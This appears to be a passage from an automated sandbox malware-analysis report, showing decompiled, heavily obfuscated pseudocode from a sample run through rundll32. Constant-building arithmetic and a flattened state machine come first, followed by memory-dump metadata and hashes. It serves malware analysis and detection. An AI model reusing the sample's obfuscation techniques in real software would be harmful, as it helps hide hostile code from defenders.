                                                                                                                                  				_v2728 = _v2728 + 0xffffb85a;
                                                                                                                                  				_v2728 = _v2728 + 0xffff17c5;
                                                                                                                                  				_v2728 = _v2728 ^ 0x00666892;
                                                                                                                                  				_v2792 = 0x34b823;
                                                                                                                                  				_v2792 = _v2792 + 0x705f;
                                                                                                                                  				_v2792 = _v2792 | 0x13d147dd;
                                                                                                                                  				_v2792 = _v2792 ^ 0x13fd2081;
                                                                                                                                  				_v2884 = 0x7f5269;
                                                                                                                                  				_v2884 = _v2884 >> 0x10;
                                                                                                                                  				_v2884 = _v2884 + 0xdf59;
                                                                                                                                  				_v2884 = _v2884 ^ 0x086ba2e3;
                                                                                                                                  				_v2884 = _v2884 ^ 0x086346ed;
                                                                                                                                  				_v2784 = 0x4150c;
                                                                                                                                  				_v2784 = _v2784 ^ 0xadfae27c;
                                                                                                                                  				_v2784 = _v2784 << 0xf;
                                                                                                                                  				_v2784 = _v2784 ^ 0x7bb89155;
                                                                                                                                  				_v2860 = 0x3ff4f9;
                                                                                                                                  				_v2860 = _v2860 + 0x97ef;
                                                                                                                                  				_v2860 = _v2860 ^ 0x8a52113e;
                                                                                                                                  				_v2860 = _v2860 * 0x3b;
                                                                                                                                  				_v2860 = _v2860 ^ 0xd244680a;
                                                                                                                                  				_v2920 = 0xf20633;
                                                                                                                                  				_v2920 = _v2920 >> 0xa;
                                                                                                                                  				_v2920 = _v2920 << 6;
                                                                                                                                  				_v2920 = _v2920 | 0x86ded8f3;
                                                                                                                                  				_v2920 = _v2920 ^ 0x86d0715a;
                                                                                                                                  				_v2676 = 0xbc4416;
                                                                                                                                  				_v2676 = _v2676 + 0x253a;
                                                                                                                                  				_v2676 = _v2676 ^ 0x00bded5f;
                                                                                                                                  				_v2928 = 0x15fa7c;
                                                                                                                                  				_v2928 = _v2928 >> 1;
                                                                                                                                  				_v2928 = _v2928 * 0x6e;
                                                                                                                                  				_v2928 = _v2928 >> 4;
                                                                                                                                  				_v2928 = _v2928 ^ 0x00445a38;
                                                                                                                                  				_v2844 = 0xaff44e;
                                                                                                                                  				_v2844 = _v2844 * 0x28;
                                                                                                                                  				_v2844 = _v2844 ^ 0x281c7ad4;
                                                                                                                                  				_v2844 = _v2844 * 0xe;
                                                                                                                                  				_v2844 = _v2844 ^ 0xcf625ac8;
                                                                                                                                  				_v2744 = 0x5c05ba;
                                                                                                                                  				_v2744 = _v2744 << 1;
                                                                                                                                  				_v2744 = _v2744 ^ 0x54918a83;
                                                                                                                                  				_v2744 = _v2744 ^ 0x542c1472;
                                                                                                                                  				_v2904 = 0xa399f4;
                                                                                                                                  				_v2904 = _v2904 / _t740;
                                                                                                                                  				_t741 = 9;
                                                                                                                                  				_v2904 = _v2904 / _t741;
                                                                                                                                  				_v2904 = _v2904 >> 0xb;
                                                                                                                                  				_v2904 = _v2904 ^ 0x000d27e7;
                                                                                                                                  				_v2912 = 0xbe4d5b;
                                                                                                                                  				_v2912 = _v2912 << 2;
                                                                                                                                  				_v2912 = _v2912 >> 8;
                                                                                                                                  				_v2912 = _v2912 + 0xbc5;
                                                                                                                                  				_v2912 = _v2912 ^ 0x000f01bd;
                                                                                                                                  				_v2888 = 0xb7f9c;
                                                                                                                                  				_v2888 = _v2888 ^ 0x23a090a0;
                                                                                                                                  				_v2888 = _v2888 + 0xffffcb65;
                                                                                                                                  				_v2888 = _v2888 + 0xffffb53f;
                                                                                                                                  				_v2888 = _v2888 ^ 0x23a896a2;
                                                                                                                                  				_v2776 = 0xcbb323;
                                                                                                                                  				_v2776 = _v2776 + 0x81c3;
                                                                                                                                  				_v2776 = _v2776 >> 1;
                                                                                                                                  				_v2776 = _v2776 ^ 0x00676393;
                                                                                                                                  				_v2648 = 0x271f91;
                                                                                                                                  				_v2648 = _v2648 + 0xffff9397;
                                                                                                                                  				_v2648 = _v2648 ^ 0x0029f035;
                                                                                                                                  				_v2896 = 0x78618c;
                                                                                                                                  				_v2896 = _v2896 << 0xc;
                                                                                                                                  				_v2896 = _v2896 ^ 0x0a821cde;
                                                                                                                                  				_v2896 = _v2896 + 0xb475;
                                                                                                                                  				_v2896 = _v2896 ^ 0x8c94da80;
                                                                                                                                  				_v2720 = 0xacdc2a;
                                                                                                                                  				_v2720 = _v2720 | 0x57611697;
                                                                                                                                  				_v2720 = _v2720 ^ 0xc01b1ef4;
                                                                                                                                  				_v2720 = _v2720 ^ 0x97fc8dfe;
                                                                                                                                  				_v2668 = 0x55603e;
                                                                                                                                  				_v2668 = _v2668 >> 1;
                                                                                                                                  				_v2668 = _v2668 ^ 0x002dad1d;
                                                                                                                                  				_v2828 = 0xf126f6;
                                                                                                                                  				_t742 = 0x29;
                                                                                                                                  				_v2828 = _v2828 * 0x43;
                                                                                                                                  				_v2828 = _v2828 + 0x8cbb;
                                                                                                                                  				_v2828 = _v2828 ^ 0x3f126f56;
                                                                                                                                  				_v2768 = 0x9c087b;
                                                                                                                                  				_v2768 = _v2768 << 9;
                                                                                                                                  				_v2768 = _v2768 + 0xffffe171;
                                                                                                                                  				_v2768 = _v2768 ^ 0x3813f585;
                                                                                                                                  				_v2880 = 0xb815a3;
                                                                                                                                  				_v2880 = _v2880 ^ 0x72879ea7;
                                                                                                                                  				_v2880 = _v2880 / _t742;
                                                                                                                                  				_v2880 = _v2880 + 0xc3b;
                                                                                                                                  				_v2880 = _v2880 ^ 0x02c00b8a;
                                                                                                                                  				_v2872 = 0xffe9a8;
                                                                                                                                  				_v2872 = _v2872 | 0x05f4b9e7;
                                                                                                                                  				_v2872 = _v2872 + 0xffff2424;
                                                                                                                                  				_v2872 = _v2872 << 7;
                                                                                                                                  				_v2872 = _v2872 ^ 0xff8a2c7e;
                                                                                                                                  				_v2808 = 0x17a98a;
                                                                                                                                  				_t743 = 0x6a;
                                                                                                                                  				_v2808 = _v2808 * 0x35;
                                                                                                                                  				_v2808 = _v2808 + 0x8a0b;
                                                                                                                                  				_v2808 = _v2808 ^ 0x04e27d5d;
                                                                                                                                  				_v2644 = 0x3aca8c;
                                                                                                                                  				_v2644 = _v2644 | 0x1dba2023;
                                                                                                                                  				_v2644 = _v2644 ^ 0x1dba33fd;
                                                                                                                                  				_v2760 = 0xa9a4ba;
                                                                                                                                  				_v2760 = _v2760 ^ 0x6721c4f3;
                                                                                                                                  				_v2760 = _v2760 + 0xffff7b43;
                                                                                                                                  				_v2760 = _v2760 ^ 0x6786e634;
                                                                                                                                  				_v2660 = 0xef5940;
                                                                                                                                  				_t327 =  &_v2660; // 0xef5940
                                                                                                                                  				_v2660 =  *_t327 / _t743;
                                                                                                                                  				_v2660 = _v2660 ^ 0x0008b7a5;
                                                                                                                                  				_v2640 = 0x8c91f9;
                                                                                                                                  				_v2640 = _v2640 + 0x2aa0;
                                                                                                                                  				_v2640 = _v2640 ^ 0x008fd6f1;
                                                                                                                                  				_v2716 = 0xebae10;
                                                                                                                                  				_v2716 = _v2716 + 0x2e93;
                                                                                                                                  				_v2716 = _v2716 >> 3;
                                                                                                                                  				_v2716 = _v2716 ^ 0x0012b27f;
                                                                                                                                  				_v2692 = 0xf4ef17;
                                                                                                                                  				_v2692 = _v2692 ^ 0x14a8ca79;
                                                                                                                                  				_v2692 = _v2692 ^ 0x145940a6;
                                                                                                                                  				_v2712 = 0x90da21;
                                                                                                                                  				_v2712 = _v2712 * 0x5c;
                                                                                                                                  				_v2712 = _v2712 << 6;
                                                                                                                                  				_v2712 = _v2712 ^ 0x039c340b;
                                                                                                                                  				_v2812 = 0x599c06;
                                                                                                                                  				_v2812 = _v2812 | 0x7b64813d;
                                                                                                                                  				_v2812 = _v2812 * 0x3e;
                                                                                                                                  				_v2812 = _v2812 ^ 0xe8633365;
                                                                                                                                  				_v2748 = 0x57b46;
                                                                                                                                  				_t744 = 0x38;
                                                                                                                                  				_v2748 = _v2748 / _t744;
                                                                                                                                  				_v2748 = _v2748 + 0xffffe4a2;
                                                                                                                                  				_v2748 = _v2748 ^ 0xffff7983;
                                                                                                                                  				_v2856 = 0xb347e1;
                                                                                                                                  				_v2856 = _v2856 << 0xf;
                                                                                                                                  				_v2856 = _v2856 + 0xc3e6;
                                                                                                                                  				_v2856 = _v2856 ^ 0xcd6ff0ef;
                                                                                                                                  				_v2856 = _v2856 ^ 0x6e991901;
                                                                                                                                  				_v2756 = 0x3d21e7;
                                                                                                                                  				_v2756 = _v2756 + 0x4052;
                                                                                                                                  				_v2756 = _v2756 + 0xfab6;
                                                                                                                                  				_v2756 = _v2756 ^ 0x0033d413;
                                                                                                                                  				_v2680 = 0xeea097;
                                                                                                                                  				_v2680 = _v2680 * 0x29;
                                                                                                                                  				_v2680 = _v2680 ^ 0x26367c85;
                                                                                                                                  				_v2852 = 0x9a84c7;
                                                                                                                                  				_v2852 = _v2852 << 4;
                                                                                                                                  				_v2852 = _v2852 + 0x5305;
                                                                                                                                  				_v2852 = _v2852 * 0x47;
                                                                                                                                  				_v2852 = _v2852 ^ 0xadc8f5b7;
                                                                                                                                  				_v2736 = 0x1d92c0;
                                                                                                                                  				_v2736 = _v2736 ^ 0x4e3febcd;
                                                                                                                                  				_v2736 = _v2736 ^ 0x2a5eeaad;
                                                                                                                                  				_v2736 = _v2736 ^ 0x647637b5;
                                                                                                                                  				_v2916 = 0x7a6f6e;
                                                                                                                                  				_v2916 = _v2916 << 3;
                                                                                                                                  				_v2916 = _v2916 | 0x74549758;
                                                                                                                                  				_v2916 = _v2916 * 0x5e;
                                                                                                                                  				_v2916 = _v2916 ^ 0x014df6ca;
                                                                                                                                  				_v2820 = 0x88f64;
                                                                                                                                  				_v2820 = _v2820 << 0xb;
                                                                                                                                  				_v2820 = _v2820 ^ 0x8d7f89a1;
                                                                                                                                  				_v2820 = _v2820 ^ 0xc90720e1;
                                                                                                                                  				_v2672 = 0x9d7b6a;
                                                                                                                                  				_v2672 = _v2672 * 0x74;
                                                                                                                                  				_v2672 = _v2672 ^ 0x47521deb;
                                                                                                                                  				_v2868 = 0x2a980b;
                                                                                                                                  				_v2868 = _v2868 << 2;
                                                                                                                                  				_v2868 = _v2868 * 0x37;
                                                                                                                                  				_v2868 = _v2868 * 0x45;
                                                                                                                                  				_v2868 = _v2868 ^ 0xdda58f8d;
                                                                                                                                  				_v2704 = 0xd94882;
                                                                                                                                  				_v2704 = _v2704 >> 7;
                                                                                                                                  				_v2704 = _v2704 ^ 0x000dd1c5;
                                                                                                                                  				_v2908 = 0x8685cf;
                                                                                                                                  				_v2908 = _v2908 >> 6;
                                                                                                                                  				_v2908 = _v2908 + 0x478f;
                                                                                                                                  				_v2908 = _v2908 | 0x9a4acbdf;
                                                                                                                                  				_v2908 = _v2908 ^ 0x9a416c75;
                                                                                                                                  				_v2724 = 0x3983d7;
                                                                                                                                  				_v2724 = _v2724 ^ 0xaf8ece10;
                                                                                                                                  				_v2724 = _v2724 + 0xfffffe8c;
                                                                                                                                  				_v2724 = _v2724 ^ 0xafb9f002;
                                                                                                                                  				_v2652 = 0xb48fd9;
                                                                                                                                  				_v2652 = _v2652 >> 7;
                                                                                                                                  				_v2652 = _v2652 ^ 0x0003170e;
                                                                                                                                  				_v2732 = 0x26e706;
                                                                                                                                  				_v2732 = _v2732 + 0xffff7cb3;
                                                                                                                                  				_v2732 = _v2732 << 7;
                                                                                                                                  				_v2732 = _v2732 ^ 0x13307998;
                                                                                                                                  				_v2840 = 0xdaf489;
                                                                                                                                  				_v2840 = _v2840 ^ 0x20b9ad9c;
                                                                                                                                  				_v2840 = _v2840 + 0xa5fa;
                                                                                                                                  				_v2840 = _v2840 ^ 0x206e4944;
                                                                                                                                  				_v2848 = 0x15799;
                                                                                                                                  				_v2848 = _v2848 + 0xffffbd76;
                                                                                                                                  				_v2848 = _v2848 | 0x84cc3dff;
                                                                                                                                  				_v2848 = _v2848 ^ 0x84c4ee28;
                                                                                                                                  				_v2740 = 0x344f78;
                                                                                                                                  				_v2740 = _v2740 | 0xed30b44e;
                                                                                                                                  				_v2740 = _v2740 + 0x582d;
                                                                                                                                  				_v2740 = _v2740 ^ 0xed3a4892;
                                                                                                                                  				_v2764 = 0x3aec11;
                                                                                                                                  				_t745 = 0x14;
                                                                                                                                  				_v2764 = _v2764 * 0x24;
                                                                                                                                  				_v2764 = _v2764 * 0xd;
                                                                                                                                  				_v2764 = _v2764 ^ 0x6bb19aaa;
                                                                                                                                  				_v2772 = 0xa2a4e3;
                                                                                                                                  				_v2772 = _v2772 * 0x54;
                                                                                                                                  				_v2772 = _v2772 + 0xd74c;
                                                                                                                                  				_v2772 = _v2772 ^ 0x35517ae7;
                                                                                                                                  				_v2780 = 0xc7cad3;
                                                                                                                                  				_v2780 = _v2780 ^ 0xe16f0727;
                                                                                                                                  				_v2780 = _v2780 + 0xa55f;
                                                                                                                                  				_v2780 = _v2780 ^ 0xe1ad612a;
                                                                                                                                  				_v2788 = 0x30bac2;
                                                                                                                                  				_v2788 = _v2788 << 2;
                                                                                                                                  				_v2788 = _v2788 * 0x19;
                                                                                                                                  				_v2788 = _v2788 ^ 0x130f6af8;
                                                                                                                                  				_v2708 = 0x5b81b7;
                                                                                                                                  				_v2708 = _v2708 << 0xd;
                                                                                                                                  				_v2708 = _v2708 ^ 0x7032fecb;
                                                                                                                                  				_v2816 = 0xe0b39a;
                                                                                                                                  				_v2816 = _v2816 + 0xf3c;
                                                                                                                                  				_v2816 = _v2816 * 0x29;
                                                                                                                                  				_v2816 = _v2816 ^ 0x23fa5b32;
                                                                                                                                  				_v2832 = 0xb37143;
                                                                                                                                  				_v2832 = _v2832 + 0xffff99de;
                                                                                                                                  				_v2832 = _v2832 / _t745;
                                                                                                                                  				_v2832 = _v2832 | 0xcb90c15e;
                                                                                                                                  				_v2832 = _v2832 ^ 0xcb9cb56b;
                                                                                                                                  				_v2824 = 0xf7e429;
                                                                                                                                  				_v2824 = _v2824 << 0x10;
                                                                                                                                  				_v2824 = _v2824 ^ 0x4b169193;
                                                                                                                                  				_v2824 = _v2824 ^ 0xaf30b470;
                                                                                                                                  				_t703 = E002E7CDB(_t745);
                                                                                                                                  				_t797 = _v2708;
                                                                                                                                  				_t736 = _t703;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					do {
                                                                                                                                  						while(1) {
                                                                                                                                  							L2:
                                                                                                                                  							_t811 = _t798 - 0xa06a9d5;
                                                                                                                                  							if(_t811 <= 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t798 - 0xae01df1;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								_push(_v2740);
                                                                                                                                  								_push(0);
                                                                                                                                  								_push(_t745);
                                                                                                                                  								_push(1);
                                                                                                                                  								_push(0);
                                                                                                                                  								_push(_v2848);
                                                                                                                                  								_t745 = _v2732;
                                                                                                                                  								_push( &_v524);
                                                                                                                                  								E002DAB87(_t745, _v2840, __eflags);
                                                                                                                                  								_t804 = _t804 + 0x1c;
                                                                                                                                  								_t798 = 0xfe27958;
                                                                                                                                  								_t707 = 0x8a3cf08;
                                                                                                                                  								goto L24;
                                                                                                                                  							} else {
                                                                                                                                  								__eflags = _t798 - 0xb104717;
                                                                                                                                  								if(_t798 == 0xb104717) {
                                                                                                                                  									_t745 = _v2748;
                                                                                                                                  									_t708 = E002D4816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
                                                                                                                                  									_t797 = _t708;
                                                                                                                                  									_t804 = _t804 + 0x10;
                                                                                                                                  									__eflags = _t708;
                                                                                                                                  									_t707 = 0x8a3cf08;
                                                                                                                                   									_t798 = (_t708 != 0) ? 0x8a3cf08 : 0xa06a9d5;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t798 - 0xe3ea8aa;
                                                                                                                                  									if(_t798 == 0xe3ea8aa) {
                                                                                                                                  										return E002E1E67(_v2708, _v2816, _v2832, _v2824, _v2628);
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t798 - 0xfe27958;
                                                                                                                                  									if(_t798 != 0xfe27958) {
                                                                                                                                  										goto L24;
                                                                                                                                  									} else {
                                                                                                                                  										E002E8519(_v2764, _v2772, _t797);
                                                                                                                                  										_pop(_t745);
                                                                                                                                  										_t798 = 0xa06a9d5;
                                                                                                                                  										while(1) {
                                                                                                                                  											L1:
                                                                                                                                  											goto L2;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L27:
                                                                                                                                  							return _t717;
                                                                                                                                  						}
                                                                                                                                  						if(_t811 == 0) {
                                                                                                                                  							E002E8519(_v2780, _v2788, _v2636);
                                                                                                                                  							_pop(_t745);
                                                                                                                                  							_t798 = 0xe3ea8aa;
                                                                                                                                  							while(1) {
                                                                                                                                  								L1:
                                                                                                                                  								goto L2;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t798 == 0xce4571) {
                                                                                                                                  							_push(_v2700);
                                                                                                                                  							_push(_v2696);
                                                                                                                                  							_push(_v2688);
                                                                                                                                  							_t745 = _v2796;
                                                                                                                                  							_push( &_v1044);
                                                                                                                                  							E002E46BB(_t745, _v2864);
                                                                                                                                  							_t804 = _t804 - 0xc + 0x1c;
                                                                                                                                  							_t798 = 0x2f0d176;
                                                                                                                                  							while(1) {
                                                                                                                                  								L1:
                                                                                                                                  								goto L2;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t798 == 0x277711d) {
                                                                                                                                  							_v2624 = E002D59E9();
                                                                                                                                  							_v2620 = 2 + E002DCB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
                                                                                                                                  							_t745 =  &_v2628;
                                                                                                                                  							_t717 = E002E8727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
                                                                                                                                  							_t804 = _t804 + 0x38;
                                                                                                                                  							__eflags = _t717;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								_t798 = 0x47e8611;
                                                                                                                                  								goto L1;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t798 == 0x2f0d176) {
                                                                                                                                  								E002EDA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
                                                                                                                                  								 *((short*)(E002DB6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
                                                                                                                                  								E002D8969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
                                                                                                                                  								_push(_v2860);
                                                                                                                                  								_push(_v2784);
                                                                                                                                  								E002D47CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E002EDCF7(_v2884, 0x2d1308, __eflags),  &_v1564, _v2844, _v2744);
                                                                                                                                  								E002DA8B0(_v2904, _t722, _v2912);
                                                                                                                                  								_t745 = _v2888;
                                                                                                                                  								_t717 = E002DEA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
                                                                                                                                  								_t804 = _t804 + 0x5c;
                                                                                                                                  								__eflags = _t717;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_t798 = 0x277711d;
                                                                                                                                  									while(1) {
                                                                                                                                  										L1:
                                                                                                                                  										goto L2;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t798 == 0x47e8611) {
                                                                                                                                  									_t745 =  &_v2636;
                                                                                                                                  									E002EDEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
                                                                                                                                  									_t804 = _t804 + 0x10;
                                                                                                                                  									asm("sbb esi, esi");
                                                                                                                                  									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
                                                                                                                                  									while(1) {
                                                                                                                                  										L1:
                                                                                                                                  										goto L2;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t816 = _t798 - _t707;
                                                                                                                                  									if(_t798 != _t707) {
                                                                                                                                  										goto L24;
                                                                                                                                  									} else {
                                                                                                                                  										_push(_v2916);
                                                                                                                                  										_push(_v2736);
                                                                                                                                  										_t730 = E002EDCF7(_v2852, 0x2d13f8, _t816);
                                                                                                                                  										_pop(_t758);
                                                                                                                                  										E002E453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
                                                                                                                                  										_t804 = _t804 + 0x24;
                                                                                                                                  										E002DA8B0(_v2724, _t730, _v2652);
                                                                                                                                  										_pop(_t745);
                                                                                                                                  										_t798 = 0xae01df1;
                                                                                                                                  										while(1) {
                                                                                                                                  											L1:
                                                                                                                                  											goto L2;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L27;
                                                                                                                                  						L24:
                                                                                                                                  						__eflags = _t798 - 0xe39a6fa;
                                                                                                                                  					} while (__eflags != 0);
                                                                                                                                  					return _t707;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002e4f74
                                                                                                                                  0x002e4f7c
                                                                                                                                  0x002e4f87
                                                                                                                                  0x002e4f8e
                                                                                                                                  0x002e4f99
                                                                                                                                  0x002e4fa4
                                                                                                                                  0x002e4fb4
                                                                                                                                  0x002e4fbc
                                                                                                                                  0x002e4fbf
                                                                                                                                  0x002e4fc3
                                                                                                                                  0x002e4fc8
                                                                                                                                  0x002e4fd0
                                                                                                                                  0x002e4fd8
                                                                                                                                  0x002e4fdd
                                                                                                                                  0x002e4fe2
                                                                                                                                  0x002e4fea
                                                                                                                                  0x002e4ff2
                                                                                                                                  0x002e4ffa
                                                                                                                                  0x002e5002
                                                                                                                                  0x002e500a
                                                                                                                                  0x002e5012
                                                                                                                                  0x002e501a
                                                                                                                                  0x002e5025
                                                                                                                                  0x002e5032
                                                                                                                                  0x002e5039
                                                                                                                                  0x002e5044
                                                                                                                                  0x002e504f
                                                                                                                                  0x002e505a
                                                                                                                                  0x002e5065
                                                                                                                                  0x002e506d
                                                                                                                                  0x002e5072
                                                                                                                                  0x002e507a
                                                                                                                                  0x002e5082
                                                                                                                                  0x002e508a
                                                                                                                                  0x002e5095
                                                                                                                                  0x002e50a0
                                                                                                                                  0x002e50ab
                                                                                                                                  0x002e50b6
                                                                                                                                  0x002e50c1
                                                                                                                                  0x002e50c8
                                                                                                                                  0x002e50d3
                                                                                                                                  0x002e50e2
                                                                                                                                  0x002e50e5
                                                                                                                                  0x002e50e9
                                                                                                                                  0x002e50f1
                                                                                                                                  0x002e50f9
                                                                                                                                  0x002e5104
                                                                                                                                  0x002e510c
                                                                                                                                  0x002e5117
                                                                                                                                  0x002e5122
                                                                                                                                  0x002e512a
                                                                                                                                  0x002e513a
                                                                                                                                  0x002e513e
                                                                                                                                  0x002e5146
                                                                                                                                  0x002e514e
                                                                                                                                  0x002e5156
                                                                                                                                  0x002e515e
                                                                                                                                  0x002e5166
                                                                                                                                  0x002e516b
                                                                                                                                  0x002e5173
                                                                                                                                  0x002e5186
                                                                                                                                  0x002e5187
                                                                                                                                  0x002e518e
                                                                                                                                  0x002e5199
                                                                                                                                  0x002e51a4
                                                                                                                                  0x002e51af
                                                                                                                                  0x002e51ba
                                                                                                                                  0x002e51c5
                                                                                                                                  0x002e51d0
                                                                                                                                  0x002e51db
                                                                                                                                  0x002e51e6
                                                                                                                                  0x002e51f1
                                                                                                                                  0x002e51fc
                                                                                                                                  0x002e5205
                                                                                                                                  0x002e520c
                                                                                                                                  0x002e5217
                                                                                                                                  0x002e5222
                                                                                                                                  0x002e522d
                                                                                                                                  0x002e5238
                                                                                                                                  0x002e5243
                                                                                                                                  0x002e524e
                                                                                                                                  0x002e5256
                                                                                                                                  0x002e5261
                                                                                                                                  0x002e526c
                                                                                                                                  0x002e5277
                                                                                                                                  0x002e5282
                                                                                                                                  0x002e5295
                                                                                                                                  0x002e529c
                                                                                                                                  0x002e52a4
                                                                                                                                  0x002e52af
                                                                                                                                  0x002e52ba
                                                                                                                                  0x002e52cd
                                                                                                                                  0x002e52d4
                                                                                                                                  0x002e52e1
                                                                                                                                  0x002e52f5
                                                                                                                                  0x002e52f8
                                                                                                                                  0x002e52ff
                                                                                                                                  0x002e530a
                                                                                                                                  0x002e5315
                                                                                                                                  0x002e531d
                                                                                                                                  0x002e5322
                                                                                                                                  0x002e532a
                                                                                                                                  0x002e5332
                                                                                                                                  0x002e533a
                                                                                                                                  0x002e5345
                                                                                                                                  0x002e5350
                                                                                                                                  0x002e535b
                                                                                                                                  0x002e5366
                                                                                                                                  0x002e5379
                                                                                                                                  0x002e5380
                                                                                                                                  0x002e538b
                                                                                                                                  0x002e5393
                                                                                                                                  0x002e5398
                                                                                                                                  0x002e53a5
                                                                                                                                  0x002e53a9
                                                                                                                                  0x002e53b1
                                                                                                                                  0x002e53bc
                                                                                                                                  0x002e53c7
                                                                                                                                  0x002e53d2
                                                                                                                                  0x002e53dd
                                                                                                                                  0x002e53e5
                                                                                                                                  0x002e53ea
                                                                                                                                  0x002e53f7
                                                                                                                                  0x002e53fb
                                                                                                                                  0x002e5403
                                                                                                                                  0x002e540e
                                                                                                                                  0x002e5416
                                                                                                                                  0x002e5421
                                                                                                                                  0x002e542c
                                                                                                                                  0x002e543f
                                                                                                                                  0x002e5446
                                                                                                                                  0x002e5451
                                                                                                                                  0x002e5459
                                                                                                                                  0x002e5463
                                                                                                                                  0x002e546c
                                                                                                                                  0x002e5470
                                                                                                                                  0x002e5478
                                                                                                                                  0x002e5483
                                                                                                                                  0x002e548b
                                                                                                                                  0x002e5496
                                                                                                                                  0x002e549e
                                                                                                                                  0x002e54a3
                                                                                                                                  0x002e54ab
                                                                                                                                  0x002e54b3
                                                                                                                                  0x002e54bb
                                                                                                                                  0x002e54c6
                                                                                                                                  0x002e54d1
                                                                                                                                  0x002e54dc
                                                                                                                                  0x002e54e7
                                                                                                                                  0x002e54f2
                                                                                                                                  0x002e54fa
                                                                                                                                  0x002e5505
                                                                                                                                  0x002e5510
                                                                                                                                  0x002e551b
                                                                                                                                  0x002e5523
                                                                                                                                  0x002e552e
                                                                                                                                  0x002e553e
                                                                                                                                  0x002e5546
                                                                                                                                  0x002e554e
                                                                                                                                  0x002e5556
                                                                                                                                  0x002e5568
                                                                                                                                  0x002e5570
                                                                                                                                  0x002e5578
                                                                                                                                  0x002e5580
                                                                                                                                  0x002e558b
                                                                                                                                  0x002e5596
                                                                                                                                  0x002e55a1
                                                                                                                                  0x002e55ac
                                                                                                                                  0x002e55c1
                                                                                                                                  0x002e55c2
                                                                                                                                  0x002e55d1
                                                                                                                                  0x002e55d8
                                                                                                                                  0x002e55e3
                                                                                                                                  0x002e55f6
                                                                                                                                  0x002e55fd
                                                                                                                                  0x002e5608
                                                                                                                                  0x002e5613
                                                                                                                                  0x002e561e
                                                                                                                                  0x002e5629
                                                                                                                                  0x002e5634
                                                                                                                                  0x002e563f
                                                                                                                                  0x002e564a
                                                                                                                                  0x002e565a
                                                                                                                                  0x002e5661
                                                                                                                                  0x002e566c
                                                                                                                                  0x002e5677
                                                                                                                                  0x002e567f
                                                                                                                                  0x002e568a
                                                                                                                                  0x002e5695
                                                                                                                                  0x002e56a8
                                                                                                                                  0x002e56af
                                                                                                                                  0x002e56ba
                                                                                                                                  0x002e56c2
                                                                                                                                  0x002e56d0
                                                                                                                                  0x002e56d4
                                                                                                                                  0x002e56dc
                                                                                                                                  0x002e56e4

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$xO4$~wP`$!=$'$zQ5
                                                                                                                                  • API String ID: 1514166925-4215140744
                                                                                                                                  • Opcode ID: d6522e3f27b03c8d313e36151a6b672b484a5f7614adb33c193656496e1e7601
                                                                                                                                  • Instruction ID: 2421a6bb3ce8cb1691274e2525a4b3ceb83eb1288edb11f287019b8eeb42ddc9
                                                                                                                                  • Opcode Fuzzy Hash: d6522e3f27b03c8d313e36151a6b672b484a5f7614adb33c193656496e1e7601
                                                                                                                                  • Instruction Fuzzy Hash: 7772FF714183819FD3B8CF25C58AB9BBBE1BBC4318F508A1DE1DA96260D7B48959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E002E2550() {
                                                                                                                                  				signed int _v28;
                                                                                                                                  				char _v36;
                                                                                                                                  				char _v84;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				intOrPtr _v144;
                                                                                                                                  				char _v152;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				char _v180;
                                                                                                                                  				char _v188;
                                                                                                                                  				char _v192;
                                                                                                                                  				char _v196;
                                                                                                                                  				char _v200;
                                                                                                                                  				char _v204;
                                                                                                                                  				signed int _v208;
                                                                                                                                  				signed int _v212;
                                                                                                                                  				signed int _v216;
                                                                                                                                  				signed int _v220;
                                                                                                                                  				signed int _v224;
                                                                                                                                  				signed int _v228;
                                                                                                                                  				signed int _v232;
